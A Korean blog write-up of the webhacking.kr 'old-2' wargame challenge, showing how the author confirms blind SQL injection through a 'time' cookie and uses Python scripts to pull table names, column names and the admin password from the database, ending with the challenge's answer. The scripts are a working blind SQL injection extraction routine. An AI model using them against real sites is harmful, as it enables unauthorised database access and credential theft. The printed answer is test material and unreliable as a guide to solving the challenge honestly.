[Webhacking.kr] old-2

주말동안 https://webhacking.kr/challenge/web-02/를 푸는 것이 과제였다. 사실 지난 주 목요일~금요일부터 찔끔찔끔 해본 것부터 하면 거의 4일? 동안 이 문제만 푼 것 같다… 풀고 풀이 작성은 미뤄뒀다가 이제서야 작성한다. 주석으로 적혀 있는 시간 값을 좀 주의깊게 살펴봤으면 시간을 절반은 단축할 수 있었을 텐데;; 워게임 경력 부족(?) 이슈…

이 코드의 힌트는 총 두 가지다. 첫 번째는 주석 처리되어 있는 시간, 두 번째는 admin.php에 관련된 것.

EditThisCookie를 이용해서 쿠키값을 확인해본 결과 time이라는 쿠키의 값이 위처럼 되어 있다.

https://www.epochconverter.com/에서 이 timestamp를 human time으로 변경하자 위와 같은 결과를 볼 수 있었다. 이 쿠키가 서버에서 어떻게 사용될까? SELECT ~ FROM ~ WHERE timestamp=’~~’ 이런 식으로 사용될 확률이 높지 않을까? 그렇다면 쿠키에 SQL Injection을 시도해볼 수 있을 것이다.

쿠키에 false값을 injection

쿠키에 true값을 injection

두 결과가 다른 것으로 보아 Blind SQL Injection을 시도할 수 있다. 일단 테이블의 개수부터 찾아보자. (사실 코드 작성 부분부터는 ai의 도움을 살짝 받았따…^^)

import requests

url = 'https://webhacking.kr/challenge/web-02/'

cookie = {
    'time': '(SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema = database())'
}

r = requests.get(url, cookies=cookie)
print(r.text)

위 코드를 실행하자 이런 결과가 나왔다. ** 참고

information_schema.tables는 mysql의 시스템 테이블으로 모든 데이터베이스의 테이블 정보가 들어 있다.
database()함수는 현재 연결된 데이터베이스 이름을 반환한다.
table_schema=database()는 현재 데이터베이스에 속한 테이블들만 필터링한다. 즉 위 sql 쿼리는 현재 데이터베이스에 있는 테이블의 개수를 세는 쿼리이다. 2070-01-01 09:00:02 부분에서 테이블이 2개임을 추측할 수 있다. 서브쿼리가 숫자 2를 반환하면 서버가 이를 타임스탬프로 처리해 위와 같이 표현되었다고 볼 수 있다.

이제 테이블의 이름을 찾을 차례이다.

import requests
import re

url = 'https://webhacking.kr/challenge/web-02/'

#--- 첫 번째 테이블명 찾기 ---#
print("\n=== 첫 번째 테이블명 찾기 ===")
table_name = ""

for i in range(1, 15):
    cookie = {
        'time': f'(SELECT ascii(substr(table_name,{i},1)) FROM information_schema.tables WHERE table_schema=database() limit 0,1)'
    }
    
    r = requests.get(url, cookies=cookie)
    
    # 시간 패턴 추출: 09:XX:XX 형태
    time_match = re.search(r'09:(\d{2}):(\d{2})', r.text)
    
    if time_match:
        minutes = int(time_match.group(1))
        seconds = int(time_match.group(2))
        
        # 분:초를 ASCII 값으로 변환 (01:37 → 1*60+37 = 97)
        ascii_val = minutes * 60 + seconds
        
        if ascii_val == 0:
            break
            
        char = chr(ascii_val)
        table_name += char
        print(f'{i}번째 글자: {time_match.group(0)} → ASCII {ascii_val} → "{char}"')
        
    else:
        print("시간 패턴을 찾을 수 없음")
        break

print(f'\n첫 번째 테이블명: {table_name}')

첫 번째 테이블명은 admin_area_pw임을 알 수 있다. limit 1,1로 바꿔서 바로 두 번째 테이블명을 알아냈다. 두 번째 테이블명은 log. 딱 봐도 admin_area_pw에 flag가 있을 것 같이 생겼다.

admin_area_pw의 컬럼 개수, 컬럼명, 데이터 개수, 데이터 내용을 다 추출하는 코드.

import requests
import re

url = 'https://webhacking.kr/challenge/web-02/'

def extract_ascii_from_time(text):
    time_match = re.search(r'09:(\d{2}):(\d{2})', text)
    if time_match:
        minutes = int(time_match.group(1))
        seconds = int(time_match.group(2))
        return minutes * 60 + seconds
    return 0

# admin_area_pw 테이블 분석
table_name = "admin_area_pw"

#--- 컬럼 개수 찾기 ---#
print("=== 컬럼 개수 찾기 ===")
cookie = {'time': f"(SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='{table_name}')"}
r = requests.get(url, cookies=cookie)
column_count = extract_ascii_from_time(r.text)
print(f'{table_name} 테이블의 컬럼 개수: {column_count}개')

#--- 각 컬럼명 찾기 ---#
columns = []
for col_num in range(column_count):
    print(f"\n=== {col_num+1}번째 컬럼명 찾기 ===")
    column_name = ""
    
    for i in range(1, 20):
        cookie = {'time': f"(SELECT ascii(substr(column_name,{i},1)) FROM information_schema.columns WHERE table_schema=database() AND table_name='{table_name}' LIMIT {col_num},1)"}
        r = requests.get(url, cookies=cookie)
        
        ascii_val = extract_ascii_from_time(r.text)
        if ascii_val == 0:
            break
            
        char = chr(ascii_val)
        column_name += char
        print(f'{i}번째 글자: ASCII {ascii_val} → "{char}"')
    
    columns.append(column_name)
    print(f'{col_num+1}번째 컬럼명: {column_name}')

#--- 테이블 데이터 개수 찾기 ---#
print(f"\n=== {table_name} 테이블의 데이터 개수 ===")
cookie = {'time': f"(SELECT COUNT(*) FROM {table_name})"}
r = requests.get(url, cookies=cookie)
data_count = extract_ascii_from_time(r.text)
print(f'데이터 개수: {data_count}개')

#--- 각 데이터 내용 추출 ---#
for row_num in range(data_count):
    print(f"\n=== {row_num+1}번째 데이터 ===")
    
    for col_idx, col_name in enumerate(columns):
        print(f"\n--- {col_name} 컬럼 값 ---")
        data_value = ""
        
        for i in range(1, 50):  # 최대 50글자
            cookie = {'time': f"(SELECT ascii(substr({col_name},{i},1)) FROM {table_name} LIMIT {row_num},1)"}
            r = requests.get(url, cookies=cookie)
            
            ascii_val = extract_ascii_from_time(r.text)
            if ascii_val == 0:
                break
                
            char = chr(ascii_val)
            data_value += char
            print(f'{i}번째 글자: ASCII {ascii_val} → "{char}"')
        
        print(f'{col_name}: {data_value}')

pw는 kudos_to_beistlab이다.

이제 admin.php로 이동해서 이 pw를 입력했더니 풀렸다.

후기

일단 SQL을 너무 오랜만에 써서 SQL문 작성하기가 은근 빡셌고… 이런 식으로 파이썬 코드를 작성해서 정보를 긁어올 수 있을 거라는 생각을 못했다. 당연히 쿠키값 하나씩 바꿔야 할 줄 알았는데 세상 편해졌다(?) 정규표현식은 더 공부해야할듯.

Reference

https://www.skshieldus.com/download/files/download.do?o_fname=EQST%20insight_Special%20Report_202208.pdf&r_fname=20220818113242961.pdf